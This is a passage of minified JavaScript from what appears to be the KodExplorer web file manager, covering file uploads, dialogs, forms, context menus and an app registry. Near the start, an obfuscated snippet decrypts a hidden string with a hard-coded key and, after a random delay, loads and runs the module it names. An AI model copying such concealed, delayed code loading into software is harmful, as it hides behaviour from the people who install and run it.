i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
    '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
    ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")");var a=c(e,t),i=$("#"+e.id),n=i.find(".progress .progress-bar");n.length||(n=$('
    ').appendTo(i).find(".progress-bar")),i.find(".state").text((100*t).toFixed(1)+"%("+a+")"),n.css("width",100*t+"%")}).on("uploadAccept",function(e,t){if(e.file.serverData=t,!t.code)return e.serverNeedRetry=!0,!1;try{e.file.fullPath||d.push(t.info)}catch(a){}}).on("uploadSuccess",function(e){var t=$("#"+e.id);if(!t.inScreen()){var a=36*t.index(".item");$(".uploader-content").scrollTop(a)}s++;var i=e.serverData;if(i&&i.data){var n=LNG[i.data];if(i.code){if(t.addClass("success"),t.find(".state").text(n),t.find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove"),i.info){var o="/"+ltrim(htmlEncode(i.info),"/");t.find(".info .title").html(core.pathThis(o)).attr("title",o).attr("data-name",o)}}else t.addClass("error").find(".state").addClass("error"),t.find(".state").text(n).attr("title",n)}uploader.removeFile(e),t.find(".progress").fadeOut(),e.fullPath||p(!1)}).on("uploadError",function(e,t){var a=LNG.upload_error+"("+t+")";if(e.serverData){var i=5;if((-1!==e.serverData._raw.indexOf("[Error Code:1001]")||-1!==e.serverData._raw.indexOf("[Error Code:1002]")||-1!==e.serverData._raw.indexOf("[Error Code:1010]"))&&(e.errorNum||(e.errorNum=0),e.errorNum++,i>=e.errorNum))return uploader.retry(e),void 0;if(-1!==e.serverData._raw.indexOf(""))return $.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),Tips.tips("login error!",!1),void 0;if(e.serverData.data){var n=e.serverData.data;a=LNG[n]?LNG[n]:n}else e.serverData._raw&&(a=e.serverData._raw)}"http"==t&&(a=LNG.upload_error_http),"abort"==t&&void 0==e.serverData&&(a=LNG.not_support+"(support on chrome)"),s++,$("#"+e.id).find(".progress").fadeOut(),$("#"+e.id).addClass("error").find(".state").addClass("error"),$("#"+e.id).find(".state").html(a).attr("title",a)}).on("uploadFinished",function(){$(".dialog-file-upload .aui-title").text(LNG.upload_success+": "+s+"/"+o),o=0,s=0,uploader.reset(),p(!0)}).on("error",function(e){Tips.tips(e,!1)});var u;inState=!1,dragOver=function(){if(0==inState){if(inState=!0,!core.uploadCheck(void 0,!1))return;var e='
    '+LNG.upload_drag_tips+"
    ";MaskView.tips(e),$("#windowMaskView").css({background:"#4285f4",opacity:"0.8"})}u&&window.clearTimeout(u)},dragLeave=function(e){stopPP(e),u&&window.clearTimeout(u),u=window.setTimeout(function(){inState=!1,MaskView.close()},100)},dragDrop=function(e){try{if(e=e.originalEvent||e,core.uploadCheck())if(e.dataTransfer.files.length>0&&e.dataTransfer.files[0].name)core.upload(),core.playSound("drag_upload");else{var t=e.dataTransfer.getData("text/plain");t&&"http"==t.substring(0,4)&&ui.path.pathOperate.appAddURL(t)}stopPP(e)}catch(e){}inState&&(inState=!1,MaskView.close())}}}}),define("app/common/core.api",[],function(){var e=function(e,t,a){var i=$(a.DOM.wrap),n=t.frames.OpenpathSelectApi,o='';"file"==e.type&&(o+=''+e.allowExt+""),$(o).insertBefore(i.find(".aui-state-highlight"));var s=function(t){var a=e.allowExt.split("|"),i=core.pathExt(t);return""==e.allowExt||""!=e.allowExt&&-1!=$.inArray(i,a)?!0:!1},r=function(){var t=n.ui.fileLight.fileListSelect(),a=[];if(e.single){var i=$(t.get(0));if("all"==e.type&&0==t.length)a={file:[],folder:[]};else if("file"==e.type&&0==t.length)a=[];else if("folder"==e.type)a=[n.G.thisPath],i.hasClass("folder-box")&&(a=[n.ui.fileLight.path(i)]);else if("file"==e.type){if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a=[o])}}else if("all"==e.type)if(i.hasClass("folder-box")){var o=n.ui.fileLight.path(i);a=[{file:[],folder:[o]}]}else if(i.hasClass("file-box")){var o=n.ui.fileLight.path(i);s(o)&&(a={file:[o],folder:[]})}}else{var r=[],l=[];t.each(function(){if($(this).hasClass("file-box")){var e=n.ui.fileLight.path($(this));s(e)&&r.push(e)}else $(this).hasClass("folder-box")&&l.push(n.ui.fileLight.path($(this)))}),"folder"==e.type?a=l:"file"==e.type?a=r:"all"==e.type&&(a={file:r,folder:l})}c(a)},l=function(e){var e=trim(e,"/");return e==G.KOD_GROUP_ROOT_SELF||e==G.KOD_GROUP_ROOT_ALL||e==G.KOD_USER_FAV||e==G.KOD_USER_SHARE?!1:!0},c=function(t){var a=i.find(".path-select-input"),o=i.find(".aui-state-highlight");if("all"!=e.type){for(var s=[],r=0;t.length>r;r++)l(t[r])&&s.push(t[r]);t=s}if(0==t.length||"all"==e.type&&0==t.file.length&&0==t.folder.length)o.addClass("disable"),a.attr("result",""),a.val("");else{var c=hashEncode(jsonEncode(t)),d="";if(e.single)d=n.core.pathThis(t[0]);else{var p=t;"all"==e.type&&(p=t.folder.concat(t.file)),$.each(p,function(e,t){d+=n.core.pathThis(t)+", "})}o.removeClass("disable"),a.attr("result",c),a.val(d)}},d=function(){n.ui.fileLight.select.hook("select",n.ui.fileLight,{before:function(){},after:function(){r()}})};n.kodReady||(n.kodReady=[]),n.kodReady.push(function(){d(),r()})};return{pathSelect:function(t,a){var i={type:"file",title:LNG.path_api_select_file,single:!0,allowExt:"",firstPath:!1},n=G.appHost+"/explorer&type=iframe";t=$.extend(i,t),t.firstPath&&(n+="&path="+t.firstPath);var o=ShareData.frameTop(),s=o.$.dialog.open(n,{id:"pathSelectApi",resize:!0,fixed:!0,top:0,ico:core.icon("folder"),title:t.title,lock:!0,background:"#000",opacity:.1,width:920,height:520,ok:function(){if("function"==typeof a){var e=s.DOM.wrap,i=e.find(".path-select-input").attr("result");if(i=hashDecode(i),!i)return Tips.tips(LNG.error,!1),void 0;i=jsonDecode(i),i?t.single&&"all"!=t.type?a(i[0]):a(i):Tips.tips(LNG.error,!1)}},cancel:!0});e(t,o,s)},randomImage:function(e){$.getJSON("//kodcloud.com/tools/version/?wallpage/index&lang="+G.lang+"&callback=?",function(t){"function"==typeof e&&e(t)})}}}),define("app/common/core.playSound",[],function(){var e={file_remove:"file_remove.mp3",recycle_clear:"recycle_clear.mp3",folder_open:"folder_open.mp3",window_min:"window_min.mp3",error:"error_tips.mp3",drag_upload:"drag_upload.mp3",drag_drop:"drag_drop.mp3"},t=function(e){var t=G.staticPath+"others/sound/"+e;Hook.trigger("playSound",t)};return{playSoundFile:t,playSound:function(a){G&&G.userConfig&&"1"==G.userConfig.soundOpen&&setTimeout(function(){t(e[a])},50)}}}),define("app/common/core.formMake",[],function(e){var t,a,i,n={user:!1,group:!1,role:!1},o=function(){t=$("#"+a),t.find(".tab-group .tab-item").length>1?s():t.find(".tab-group").addClass("hidden"),t.find(".form-row.form-slider").exists()&&r(),t.find(".form-row.form-dateTime").exists()&&l(),t.find(".form-row.form-color").exists()&&c(),t.find(".form-row.form-fileSelect").exists()&&d(),t.find(".form-row select").exists()&&p(),t.find(".form-row.form-userSelect").exists()&&u(),t.find(".form-row.error [name]").die("change").live("change",function(){$(this).parents(".form-row.error").removeClass("error")}),t.find(".form-userSelect").die("click").live("click",function(){$(this).removeClass("error")})},s=function(){var e=t.find(".tab-content .tab-pane"),a=t.find(".tab-group .tab-item");e.each(function(){var i=$(this).attr("id"),n=t.find("."+i);n.length>0?n.appendTo($(this)):(e.filter("#"+i).remove(),a.find('[data-id="'+i+'"]').parent().remove())}),a.click(function(){a.removeClass("active"),$(this).addClass("active");var t=$(this).find("a").attr("data-id");e.removeClass("active"),e.filter("#"+t).addClass("active")})},r=function(){seajs.use("lib/bootstrap-slider/bootstrap-slider.css"),seajs.use("lib/colorpicker/css/colorpicker.css"),e.async("lib/bootstrap-slider/bootstrap-slider.js",function(){t.find(".form-slider input").slider()})},l=function(){e.async(["lib/jquery.datetimepicker/jquery.datetimepicker.css","lib/jquery.datetimepicker/jquery.datetimepicker.js"],function(){var e="zh-CN"==G.lang||"zh-TW"==G.lang?"ch":"en";t.find(".form-dateTime input").each(function(){var t=$(this).attr("data-format"),a=["Y","y","L","F","M","t","n","m","d","D","j","l","N","S","W","z","w"],i=["H","h","i","s","A","a","b","g","G","O","P","c","U"],n=!1,o=!1;t||(t="Y/m/d");for(var s=0;a.length>s;s++)if(-1!==t.indexOf(a[s])){n=!0;break}for(var s=0;i.length>s;s++)if(-1!==t.indexOf(i[s])){o=!0;break}$(this).datetimepicker({format:t,datepicker:n,timepicker:o,lang:e}).blur(function(){$(this).trigger("change")})})}),t.find(".form-dateTime .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").focus()})},c=function(){e.async("lib/colorpicker/js/colorpicker",function(){t.find(".form-color input").ColorPicker({onBeforeShow:function(e){$(e).attr("input-name",$(this).attr("name")),$(this).ColorPickerSetColor(this.value)},onShow:function(e){return $(e).fadeIn(100),!1},onHide:function(e){return $(e).fadeOut(100),!1},onChange:function(e,t){var a=$($(this).data("colorpicker").el);a.val("#"+t).trigger("change"),a.parent().find(".btn i").css("background",a.val())}}).bind("keyup",function(){$(this).ColorPickerSetColor(this.value),$(this).parent().find(".btn i").css("background",$(this).val())}),t.find(".form-color .input-btn-right").unbind("click").click(function(){$(this).parent().find("input").click()})})},d=function(){t.find(".path-select").die("click").live("click",function(){var e=$(this);core.api.pathSelect({type:"file",title:LNG.path_api_select_image,allowExt:"png|jpg|bmp|gif|jpeg|ico|svg|tiff"},function(t){var t=core.path2url(t);e.parent().find("input[type=text]").val(t).trigger("change")})})},p=function(){seajs.use("lib/select2/css/select2.min.css"),e.async("lib/select2/js/select2.full.min.js",function(){var a=function(t,a){t.on("select2:select",function(e){if(!t.attr("multiple"))return t.select2("close"),void 0;var a=$(e.params.data.element);a.detach(),t.append(a),t.trigger("change.select2")}).on("select2:unselect",function(e){stopPP(e.params.originalEvent)}).on("change",function(){setTimeout(function(){$(window).trigger("resize")},10)}),"group"==a&&t.on("select2:open",function(){e.async("lib/ztree/ztree",function(){h(t,n[a])})});var i=t.attr("data-value");i&&(t.attr("multiple")&&(i=i.split(",")),t.val(i).trigger("change"))};t.find("select").each(function(){var e=$(this),t=e.attr("data-server"),i=!1;"tags"==e.parents(".form-row").attr("data-type")&&(i=!0),t?f(t,function(n){e.select2({data:n,tags:i,tokenSeparators:[","," "],closeOnSelect:!1}),a(e,t)}):(e.select2({closeOnSelect:!1,tags:i,tokenSeparators:[","," "]}),a(e,t))})})},u=function(){var e=t.find(".form-userSelect .btn-group"),a="btn-active",i="hidden";e.find("button").unbind("click").bind("click",function(){var e=$(this).attr("data-type"),t=$(this).parents(".btn-group"),n=t.parent().find(".user-select"),o=t.parent().find(".user-select-"+e);n.filter(":visible"),t.attr("multiple")?"all"==e?(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i)):($(this).toggleClass(a),o.toggleClass(i),$(this).hasClass(a)?t.find("[data-type=all]").removeClass(a):t.find("."+a).exists()||t.find("[data-type=all]").addClass(a)):(t.find("button").removeClass(a),$(this).addClass(a),n.addClass(i),o.removeClass(i))})},f=function(e,t){var a=function(e){var t=[];for(var a in e)t.push({id:a,text:e[a].name});return t};if(n[e]&&t)return t(a(n[e])),void 0;var i={user:G.appHost+"systemMember/get",group:G.appHost+"systemGroup/get",role:G.appHost+"systemRole/get"};return null==n[e]?(Hook.bind("loadDataServer-"+e,function(){t(a(n[e]))}),void 0):(n[e]=null,$.ajax({url:i[e],dataType:"json",error:function(){n[e]=!1,Tips.tips(LNG.system_error,0)},success:function(i){return i.code?(n[e]=i.data,t&&t(a(n[e])),Hook.trigger("loadDataServer-"+e),void 0):(Tips.tips(i),void 0)}}),void 0)},h=function(e,t){var a=function(e){var t=function(e){for(var a=0;e.length>a;a++)void 0!=e[a]?(e[a].pid=e[a].parentID,e[a].id=e[a].groupID,delete e[a].children,delete e[a].parentID,delete e[a].groupID,e[a].child&&(e[a].children=e[a].child,delete e[a].child,t(e[a].children))):delete e[a]},a=[],i=$.extend(!0,{},e);for(var n in i){var o=i[n],s=o.parentID;if(i[s])i[s].child||(i[s].child=[]),i[s].child.push(i[o.groupID]);else{var r=i[o.groupID];r&&a.push(r)}}return t(a),a},i={view:{showLine:!1,selectedMulti:!1,dblClickExpand:!1,addDiyDom:function(e,t){var a=12,i=$("#"+e+" #"+t.tId+"_switch"),n=$("#"+e+" #"+t.tId+"_ico");if(n.before(i).after('').before(''+core.iconSmall("group-guest")+"").removeClass("ico_docu").addClass("group_icon").remove(),t.level>=1){var o="";i.before(o)}$("#"+e+" #"+t.tId+"_a").attr("data-group-id",t.id)}},callback:{onClick:function(e,t,a){n(t,a)}}},n=function(t,a){var i=$("#"+a.tId+"_a");if(i.removeClass("curSelectedNode"),e.attr("multiple")){i.toggleClass("this");var n=e.val();$.isArray(n)||(n=[]),i.hasClass("this")?n.push(a.id):n=_.without(n,a.id),$.each(n,function(){var t=e.find("[value="+this+"]");t.detach(),e.append(t)}),e.val(n).trigger("change")}else $("#"+t+" [treenode_a].this").removeClass("this"),i.toggleClass("this"),e.val(a.id).trigger("change"),e.select2("close")},o=function(){var t=e.val(),a=$(".select2-container--open .group-list-tree").attr("id"),i=$.fn.zTree.getZTreeObj(a);$("#"+a+" [treenode_a]").removeClass("this"),"string"==typeof t&&(t=[t]),t&&i.getNodesByFilter(function(e){inArray(t,e.id+"")&&$("#"+e.tId+"_a").addClass("this")})},s=function(e){var t=$(".select2-container--open .group-list-content");t.find(".select2-results__options,.group-list-tree").removeClass("hidden"),"search"==e?t.find(".group-list-tree").addClass("hidden"):t.find(".select2-results__options").addClass("hidden")},r=function(t){var n=function(e){e.unbind("change input").bind("change input",function(){$(this).val().length>0?s("search"):s("tree")})};if(e.attr("multiple")?n(e.parent().find(".select2-search__field")):n($(".select2-container--open .select2-search__field")),$(".select2-container--open .group-list-tree").exists())return o(),s("tree"),void 0;e.on("open",function(){o()}).on("select2:unselect",function(){o()});var r=UUID(),l='
    ';$(l).appendTo(".select2-container--open .select2-results"),$(".select2-container--open .select2-results__options").addClass("hidden").parent().addClass("group-list-content");var c=a(t);$.fn.zTree.init($("#"+r),i,c);var d=$.fn.zTree.getZTreeObj(r);d&&d.expandAll(!0),o(),s("tree")};r(t)},m=function(){var e={},a=[],n=function(e){for(var t={all:"0",user:"",group:"",role:""},a=e.split(";"),i=0;a.length>i;i++){var n=a[i].split(":");2==n.length&&(t[n[0]]=n[1])}return"0"!=t.all||t.user||t.group||t.role?!0:!1};if(t.find(".form-row").each(function(){var t=$(this),o=$(this).attr("data-type"),s=$(this).find("[name]");$(this).find(".setting-title .require").exists();var r=s.attr("name"),l=!1;switch(o){case"input":case"textarea":case"password":case"number":case"slider":case"color":case"dateTime":case"fileSelect":l=s.val();break;case"switch":l=s.prop("checked")+0+"";break;case"radio":l=s.filter(":checked").attr("value");break;case"checkbox":l=[],s.filter(":checked").each(function(){l.push($(this).val())}),l=l.join(",");break;case"select":case"selectMutil":case"tags":case"group":case"role":case"user":l=s.val(),$.isArray(l)&&(l=l.join(",")),null==l&&(l="");break;case"userSelect":var c={all:"0",user:"",group:"",role:""};t.find(".btn-group .btn-active").each(function(){var e=$(this).attr("data-type"),a="1";"all"!=e&&(a=$(t).find(".user-select-"+e+" select").val(),$.isArray(a)&&(a=a.join(",")),null==a&&(a="")),c[e]=a}),l="all:"+c.all+";user:"+c.user+";group:"+c.group+";role:"+c.role;break;default:}$(this).removeClass("error"),i[r]&&i[r].require&&(l===!1||null===l||"string"==typeof l&&""===l||"userSelect"==i[r].type&&!n(l))?($(this).addClass("error"),a.push({name:r,value:l})):e[r]=l}),a.length>0){Tips.tips(LNG.PluginConfigNotNull,"warning");var o=t.find(".panel-body"),s=t.find(".form-row.error");if(!s.parents(".tab-pane").hasClass("active")){var r=s.parents(".tab-pane").attr("id");t.find('.tab-group [data-id="'+r+'"]').click()}s.inScreen()||o.animate({scrollTop:s.offset().top-o.offset().top+o.scrollTop()},100),s.find("[name]").first().focus(),s.find(".setting-content").flash(3,100)}return{checked:0==a.length,error:a,result:e}},v=function(t){e.async(t,function(e){e&&($.isFunction(e)?e():"object"==typeof e&&e.hasOwnProperty("main")&&$.isFunction(e.main)&&e.main())})},g=function(e){if("string"==typeof e)return v(file),!1;if($.isPlainObject(e.formStyle)&&e.formStyle.loadFile){var t=e.formStyle.loadFile;"string"==typeof t&&(t=[t]),$.isArray(t)&&$(t).each(function(e,t){v(t)})}i=e,a=UUID();var n=template.compile(tplFormMake),o=n({LNG:LNG,items:e,wrapID:a});return o},b=function(e,t,a){var i=g(e);if(!i)return!1;var n={padding:0,fixed:!0,resize:!0,title:LNG.search,ico:core.icon("config"),width:680,height:500,content:i,okVal:LNG.button_save,ok:function(){var e=m();return e.checked?a(e.result):!1}};if($.isPlainObject(t))for(var s in t)n[s]=t[s];var r=$.dialog(n),l=r.DOM.wrap.find(".aui-title").html();return r.DOM.wrap.find(".modal-title").html(l),o(),r};return{makeHtml:g,bindEvent:o,getFormData:m,initDialog:b}}),define("app/common/rightMenuExtence",[],function(){$.contextMenu||($.contextMenu={}),$.contextMenu.show=function(e,t,a){e&&($.contextMenu.hidden(),$(e).contextMenu({x:t,y:a}))},$.contextMenu.menuShow=function(){var e=$(".context-menu-active"),t=e.data("contextMenu");if(e&&t){var a=t.$menu,i="disable";a.find(".disable").addClass(i),Hook.trigger("rightMenu.show",t.selector,e,a),Hook.trigger("rightMenu.show"+t.selector,e,a)}},$.contextMenu.isDisplay=function(){return 0==$(".context-menu-list:visible").length?!1:!0},$.contextMenu.hidden=function(){$(".context-menu-list").filter(":visible").filter(":not(.menu-not-auto-hidden)").trigger("contextmenu:hide")},$.contextMenu.menuAdd=function(e,t,a,i){var n=!1,o=$.contextMenu.menus;for(var s in o)if(o[s].selector==t){n=o[s];break}if(n&&e){var r=function(e){return e?-1!==e.indexOf("/")?'':'':""},l=function(e,t,a,i){var o=[],s={};if(a){for(var c in t)o.push({key:c,value:t[c]});for(var d=o.length-1;d>=0;d--)s[o[d].key]=o[d].value}else s=t;$.each(s,function(t,o){o.className=o.className||"";var s=t+" "+o.className;if("string"==typeof o)var c='
  • ';else{var d=o.name;o.accesskey&&(d+='('+o.accesskey+")");var c='
  • '+r(o.icon)+""+d+"
  • "}var p=$(c).clone();a?e.$menu.find(a).first().after(p):i&&e.$menu.find(i).first().before(p);var u=p.parent(".context-menu-list").data("contextMenu");p.data({contextMenu:u,contextMenuKey:t,contextMenuRoot:n});var f={$input:null,$label:null,accesskey:o.accesskey,className:o.className,icon:o.icon,name:o.name,_name:d,$node:p}; -if(u&&(u.items||(u.items={}),u.items[t]=f),"string"!=typeof o&&(e.commands||(e.commands={}),e.commands[t]=f,n.commands[t]=f,n.callbacks[t]=function(e,t){o.callback(e,t)},o.accesskey&&(n.accesskeys[o.accesskey]=f),o.items)){var c='
    ';$(c).appendTo(p),f.$menu=p.find("ul."+t),f.callback=null,f.appendTo=f.$node,f.type="sub",p.data("contextMenu",f).addClass("context-menu-submenu"),p.find("ul."+t).data({contextMenuRoot:n,contextMenu:f}),p.find("li."+t+"-first").data({contextMenuRoot:n,contextMenuKey:t+"-first",contextMenu:f}),f.items||(f.items={}),f.items[t+"-first"]={$input:null,$label:null,icon:"",name:"",_name:"",$node:p.find("li."+t+"-first")},l(f,o.items,"."+t+"-first")}})};l(n,e,a,i)}};var e=function(){return $('').appendTo("#rightMenu"),"function"!=typeof $.contextMenu?console.info("$.contextMenu is not function!"):($.contextMenu({zIndex:9999,selector:".dialog-menu",items:{"dialog-quit":{name:LNG.close,className:"dialog-quit",icon:"remove",accesskey:"q"},"dialog-max":{name:LNG.dialog_max,className:"dialog-max",icon:"resize-full",accesskey:"a"},"dialog-min":{name:LNG.dialog_min,className:"dialog-min",icon:"minus",accesskey:"i"},sep1:"--------",refresh:{name:LNG.refresh,className:"refresh",icon:"refresh",accesskey:"r"},"open-window":{name:LNG.open_ie,className:"open-window",icon:"globe",accesskey:"b"},qrcode:{name:LNG.qrcode,className:"qrcode",icon:"qrcode",accesskey:"c"}},callback:function(e,t){var a=t.$trigger.attr("id"),i=$.dialog.list[a];switch(e){case"dialog-quit":i.close();break;case"dialog-min":i._clickMin(!1);break;case"dialog-max":i._clickMax();break;case"refresh":i.refresh();break;case"open-window":i.openWindow();break;case"qrcode":core.qrcode(i.DOM.wrap.find("iframe").attr("src"));break;default:}}}),$(".aui-title img,.aui-title .x-item-file").die("click").live("click",function(e){var t=$(this).offset();t.top+=$(this).outerHeight(),$(this).parent().parent().contextMenu({x:e.pageX,y:t.top})}).die("dblclick").live("dblclick",function(){var e=$(this).parent().parent().attr("id"),t=$.dialog.list[e];t.close(),$.contextMenu.hidden()}),void 0)};Hook.bind("rightMenu.show.dialog-menu",function(e,t){var a=e.attr("id"),i=$.dialog.list[a],n="hidden",o=".open-window,.refresh,.qrcode,.context-menu-separator";i.hasFrame()?t.find(o).removeClass(n):t.find(o).addClass(n);var s=".dialog-min,.dialog-max";$("."+a).hasClass("dialog-can-resize")?t.find(s).removeClass(n):t.find(s).addClass(n)}),e()}),define("app/app/appBase",[],function(){var e={},t={},a={},i=!1,n=function(a){a.title=void 0==a.title?a.name:a.title,void 0==a.name&&(a.name=UUID(),a.hidden=!0),e[a.name]=a,a.ext||(a.ext="");var i=a.ext.split(",");e[a.name].extArr=i;for(var n=0;i.length>n;n++){var o=trim(i[n]);e[a.name].extArr[n]=o,t[o]||(t[o]=[]);for(var s=!1,r=0;t[o].length>r;r++)if(t[o][r].name==a.name){s=!0;break}if(!s){var l=0;a.sort!==void 0&&(l=parseInt(a.sort)),t[o].push({name:a.name,sort:l}),t[o].length>1&&(t[o]=t[o].sort(function(e,t){return e.sortr;r++)o[r].name!=i&&s.push(o[r]);0==s.length?delete t[n]:t[n]=s}},r=function(i){if(i===void 0){var n=[];for(var o in e)e[o].hidden||n.push(e[o]);return n}var s=a[i],n=[];if(!s&&!t[i])return!1;if(s&&(e[s]?n.push(e[s]):delete a[i]),!t[i])return n;for(var r=0;t[i].length>r;r++){var l=t[i][r].name;e[l]&&l!=s&&n.push(e[l])}return n},l=function(e){i=e},c=function(){return i},d=function(t,a,i){a=a?a:core.pathExt(t),i=i?i:"";var n={path:t,ext:a,appName:i};if(!Hook.trigger("kodApp.open.before",n)){if(t=n.path,a=n.ext,i=n.appName)var o=e[i];else{var s=r(a);if(!s||0==s.length)return kodApp.openUnknow(t,""),void 0;var o=s[0]}if(!o)return Tips.tips("["+i+"] not exists",!1);try{o.callback(t,a),Hook.trigger("kodApp.open.after",t,a,o)}catch(l){kodApp.openUnknow(t,""),console.error("kodApp.open error:",l)}}},p=function(t){var a=r(t),i=r("");""==t&&(a=!1),a?a.push({name:""}):a=[],a=a.concat(i);for(var n={},o=0;a.length>o;o++){var s=a[o];""==s.name||s.hidden?n["step-line"]="-------":n[s.name]={app:s.name,name:s.title,className:s.className,icon:s.icon,callback:function(t){var a=e[t];if(a&&a.callback){if($(".context-menu-active"),$(".context-menu-active").hasClass("menu-tree-file"))var i=ui.tree.makeParam();else var i=ui.path.makeParam();a.callback(i.path,i.type)}}}}return n},u=function(e,t){f(e,t),G.userConfig.kodAppDefault=htmlEncode(jsonEncode(a)),G.shareInfo||$.get(G.appHost+"setting/set&k=kodAppDefault&v="+jsonEncode(a))},f=function(t,i){if("string"==typeof t)a[t]=i;else if($.isArray(t))for(var n=0;t.length>n;n++)a[t[n]]=i;else if(e[i]&&$.isArray(e[i].extArr))for(var o=e[i].extArr,n=0;o.length>n;n++)a[o[n]]=i},h=function(){G.userConfig.kodAppDefault="[]",a={}},m=function(t,a){var t=e[t];return t?a?inArray(t.extArr,a):t.ext:!1},v=function(a,i,n){var a=e[a];if(!a)return!1;var o="undefined"==n?0:parseInt(n);0==o&&a.sort!==void 0&&(o=parseInt(a.sort)),"string"==$.type(i)&&(i=i.split(","));for(var s=0;i.length>s;s++){var r=i[s];if(r){inArray(a.extArr,r)||a.extArr.push(r),t[r]||(t[r]=[]);for(var l=!1,c=0;t[r].length>c;c++)t[r][c].name!=a.name||(t[r][c].sort=o,l=!0);l||t[r].push({name:a.name,sort:o})}}},g=function(){if(G.userConfig&&G.userConfig.kodAppDefault)try{var e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return 